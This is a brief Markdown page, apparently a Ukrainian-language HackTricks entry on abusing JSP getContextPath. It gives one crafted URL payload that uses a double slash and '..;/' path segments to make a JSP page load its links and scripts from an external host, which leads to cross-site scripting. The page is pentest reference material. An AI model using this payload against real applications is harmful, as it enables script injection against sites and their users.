16 lines
585 B
Markdown

# JSP
{{#include ../../banners/hacktricks-training.md}}
## **зловживання getContextPath**
Інформація з [here](https://blog.rakeshmane.com/2020/04/jsp-contextpath-link-manipulation-xss.html).
```
http://127.0.0.1:8080//rakeshmane.com/xss.js#/..;/..;/contextPathExample/test.jsp
```
Доступаючи до цього веб-сайту, ви можете змінити всі посилання для запиту інформації на _**rakeshmane.com**_:
![](<../../images/image (326).png>)
{{#include ../../banners/hacktricks-training.md}}